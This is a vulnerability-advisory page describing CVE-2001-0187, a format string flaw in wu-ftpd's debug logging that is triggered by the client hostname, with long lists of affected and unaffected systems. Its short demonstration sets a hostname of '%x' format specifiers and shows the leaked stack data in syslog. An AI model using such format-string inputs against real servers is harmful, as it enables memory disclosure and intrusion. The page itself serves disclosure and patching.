exploits , vulnerabilities , articles , Wu-Ftpd Debug Mode Client Hostname Format String Vulnerability

Title	Wu-Ftpd Debug Mode Client Hostname Format String Vulnerability
Published	2001-01-23-12:00AM
Updated	2004-09-01-04:16PM
Class	Input Validation Error
CVE	CVE-2001-0187
Remote	Yes
Local	No
Credit	Reportedly discovered by the Wu-ftpd team.
Vulnerable	Washington University wuftpd 2.6.1 Caldera OpenLinux 2.3 Caldera OpenLinux Server 3.1 Cobalt Qube 1.0 Conectiva Linux 6.0 Conectiva Linux 7.0 Conectiva Linux 8.0 FreeBSD FreeBSD 4.3 FreeBSD FreeBSD 4.3 RELEASE FreeBSD FreeBSD 4.3 STABLE FreeBSD FreeBSD 4.4 FreeBSD FreeBSD 5.0 FreeBSD FreeBSD 5.0 alpha MandrakeSoft Corporate Server 1.0.1 MandrakeSoft Linux Mandrake 6.0 MandrakeSoft Linux Mandrake 6.1 MandrakeSoft Linux Mandrake 7.0 MandrakeSoft Linux Mandrake 7.1 MandrakeSoft Linux Mandrake 7.2 MandrakeSoft Linux Mandrake 8.0 MandrakeSoft Linux Mandrake 8.0 ppc MandrakeSoft Linux Mandrake 8.1 RedHat Linux 7.0 alpha RedHat Linux 7.0 i386 RedHat Linux 7.0 sparc RedHat Linux 7.1 alpha RedHat Linux 7.1 i386 RedHat Linux 7.1 i586 RedHat Linux 7.1 i686 RedHat Linux 7.1 ia64 RedHat Linux 7.1 noarch RedHat Linux 7.2 alpha RedHat Linux 7.2 athlon RedHat Linux 7.2 i386 RedHat Linux 7.2 i586 RedHat Linux 7.2 i686 RedHat Linux 7.2 ia64 RedHat Linux 7.2 noarch S.u.S.E. Linux 7.0 S.u.S.E. Linux 7.0 alpha S.u.S.E. Linux 7.0 ppc S.u.S.E. Linux 7.0 sparc S.u.S.E. Linux 7.1 S.u.S.E. Linux 7.1 alpha S.u.S.E. Linux 7.1 ppc S.u.S.E. Linux 7.1 sparc S.u.S.E. Linux 7.1 x86 S.u.S.E. Linux 7.2 S.u.S.E. Linux 7.3 SCO eDesktop 2.4 SCO eServer 2.3.1 SCO Open Server 5.0 SCO Open Server 5.0.1 SCO Open Server 5.0.2 SCO Open Server 5.0.3 SCO Open Server 5.0.4 SCO Open Server 5.0.5 SCO Open Server 5.0.6 SCO Open Server 5.0.6 a Slackware Linux 7.0 Slackware Linux 7.1 Slackware Linux 8.0 Turbolinux Turbolinux 6.0 Turbolinux Turbolinux 6.0.1 Turbolinux Turbolinux 6.0.2 Turbolinux Turbolinux 6.0.3 Turbolinux Turbolinux 6.0.4 Turbolinux Turbolinux 6.0.5 Turbolinux Turbolinux Workstation 6.1 Wirex Immunix OS 7 Wirex Immunix OS 7.0 Wirex Immunix OS 7.0 Beta Washington University wuftpd 2.6 .0 Cobalt Qube 1.0 Conectiva Linux 4.0 Conectiva Linux 4.0 es Conectiva Linux 4.1 Conectiva Linux 4.2 Conectiva Linux 5.0 Conectiva Linux 5.1 Debian Linux 2.2 Debian Linux 2.2 68k Debian Linux 2.2 alpha Debian Linux 2.2 arm Debian Linux 2.2 powerpc Debian Linux 2.2 sparc FreeBSD FreeBSD 4.3 FreeBSD FreeBSD 4.3 RELEASE FreeBSD FreeBSD 4.3 STABLE FreeBSD FreeBSD 4.4 HP HPUX 11.0 HP HPUX 11.11 RedHat Linux 5.2 alpha RedHat Linux 5.2 i386 RedHat Linux 5.2 sparc RedHat Linux 6.0 RedHat Linux 6.0 alpha RedHat Linux 6.0 sparc RedHat Linux 6.1 alpha RedHat Linux 6.1 i386 RedHat Linux 6.1 sparc RedHat Linux 6.2 alpha RedHat Linux 6.2 i386 RedHat Linux 6.2 sparc S.u.S.E. Linux 6.1 S.u.S.E. Linux 6.1 alpha S.u.S.E. Linux 6.2 S.u.S.E. Linux 6.3 S.u.S.E. Linux 6.3 alpha S.u.S.E. Linux 6.3 ppc S.u.S.E. Linux 6.4 S.u.S.E. Linux 6.4 alpha S.u.S.E. Linux 6.4 ppc S.u.S.E. Linux 7.0 alpha S.u.S.E. Linux 7.0 i386 S.u.S.E. Linux 7.0 ppc S.u.S.E. Linux 7.0 sparc S.u.S.E. Linux 7.1 alpha S.u.S.E. Linux 7.1 ppc S.u.S.E. Linux 7.1 sparc S.u.S.E. Linux 7.1 x86 S.u.S.E. Linux 7.2 i386 S.u.S.E. Linux 7.3 i386 S.u.S.E. Linux 7.3 ppc S.u.S.E. Linux 7.3 sparc Turbolinux Turbolinux 4.0 Wirex Immunix OS 6.2 Washington University wuftpd 2.5 .0 Caldera OpenLinux 2.4 Caldera OpenLinux Desktop 2.3 RedHat Linux 6.0 RedHat Linux 6.0 alpha RedHat Linux 6.0 sparc SCO eDesktop 2.4 SCO eServer 2.3 SCO eServer 2.3.1 Washington University wuftpd 2.4.2 academ[BETA115] Caldera OpenLinux Standard 1.2 Washington University wuftpd 2.4.2 academ[BETA18] RedHat Linux 5.2 i386 Washington University wuftpd 2.4.2 VR17 Washington University wuftpd 2.4.2 VR16 Washington University wuftpd 2.4.2 (beta 18) VR9 Washington University wuftpd 2.4.2 (beta 18) VR8 Washington University wuftpd 2.4.2 (beta 18) VR7 Washington University wuftpd 2.4.2 (beta 18) VR6 Washington University wuftpd 2.4.2 (beta 18) VR5 Washington University wuftpd 2.4.2 (beta 18) VR4 Washington University wuftpd 2.4.2 (beta 18) VR15 Washington University wuftpd 2.4.2 (beta 18) VR14 Washington University wuftpd 2.4.2 (beta 18) VR13 Washington University wuftpd 2.4.2 (beta 18) VR12 Washington University wuftpd 2.4.2 (beta 18) VR11 Washington University wuftpd 2.4.2 (beta 18) VR10 Washington University wuftpd 2.4.1
Not Vulnerable	Washington University wu-ftpd 2.6.2 Compaq Tru64 4.0 b Compaq Tru64 4.0 d Compaq Tru64 4.0 d PK9 (BL17) Compaq Tru64 4.0 e Compaq Tru64 4.0 f Compaq Tru64 4.0 f PK6 (BL17) Compaq Tru64 4.0 f PK7 (BL18) Compaq Tru64 4.0 g Compaq Tru64 4.0 g PK3 (BL17) Compaq Tru64 5.0 Compaq Tru64 5.0 PK4 (BL17) Compaq Tru64 5.0 PK4 (BL18) Compaq Tru64 5.0 a Compaq Tru64 5.0 a PK3 (BL17) Compaq Tru64 5.0 f Compaq Tru64 5.1 Compaq Tru64 5.1 PK3 (BL17) Compaq Tru64 5.1 PK4 (BL18) Compaq Tru64 5.1 PK5 (BL19) Compaq Tru64 5.1 PK6 (BL20) Compaq Tru64 5.1 a Compaq Tru64 5.1 a PK1 (BL1) Compaq Tru64 5.1 a PK2 (BL2) Compaq Tru64 5.1 a PK3 (BL3) Compaq Tru64 5.1 a PK4 (BL21) Compaq Tru64 5.1 a PK5 (BL23) Compaq Tru64 5.1 b Compaq Tru64 5.1 b PK1 (BL1) Compaq Tru64 5.1 b PK2 (BL22) Conectiva Linux 9.0 Debian Linux 3.0 Debian Linux 3.0 alpha Debian Linux 3.0 arm Debian Linux 3.0 hppa Debian Linux 3.0 ia-32 Debian Linux 3.0 ia-64 Debian Linux 3.0 m68k Debian Linux 3.0 mips Debian Linux 3.0 mipsel Debian Linux 3.0 ppc Debian Linux 3.0 s/390 Debian Linux 3.0 sparc MandrakeSoft Linux Mandrake 8.2 MandrakeSoft Linux Mandrake 8.2 ppc SCO Open Server 5.0.6 SCO Open Server 5.0.6 a SCO Open Server 5.0.7 Sun Linux 5.0.7 Turbolinux Turbolinux Advanced Server 6.0 Turbolinux Turbolinux Server 6.1 Turbolinux Turbolinux Workstation 6.0
Code	The following example demonstrates the vulnerability. Note: /etc/hosts is used as the example name resolving mechanism. Could be DNS, NIS, etc. Conditions: $ grep 127.0.0.1 /etc/hosts 127.0.0.1 %x%x%x%x%x%x%x%x%x%x $ grep ftpd /etc/inetd.conf ftp stream tcp nowait root /usr/sbin/tcpd /tmp/wuftpd-2.6.0/src/ftpd -v $ ncftpget -F 127.0.0.1 /tmp /usr/lib/ld.so $ tail /var/log/syslog.debug Jan 24 14:17:01 xxx ftpd[30912]: PASV port 47479 assigned to 80862b0806487eb9778084da87bffff16c9640151020bfffe108401c9004 [127.0.0.1] ..<snip extra output>..
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-14 Microsoft Protected Extensible Authentication Protocol Authentication Bypass Vulnerability
• 2009-12-14 Google Chrome DNS Pre-Fetching Proxy Cache Information Disclosure Vulnerability
• 2009-12-14 Oracle E-Business Suite Multiple Remote Vulnerabilities
• 2009-12-14 MySQL Multiple Remote Denial Of Service Vulnerabilities
• 2009-12-14 Digital Scribe Multiple SQL Injection Vulnerabilities
• 2009-12-14 Microsoft WordPad and Office Text Converters Word 97 File Parsing Memory Corruption Vulnerability
• 2009-12-14 Microsoft Protected Extensible Authentication Protocol Memory Corruption Vulnerability
• 2009-12-14 WebKit Web Inspector Cross Site Scripting Vulnerability
• 2009-12-11 Symantec Veritas VRTSweb Incoming Data Remote Code Execution Vulnerability
• 2009-12-11 HP OpenView Network Node Manager Perl CGI Executables Remote Code Execution Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 06:57:19 +0000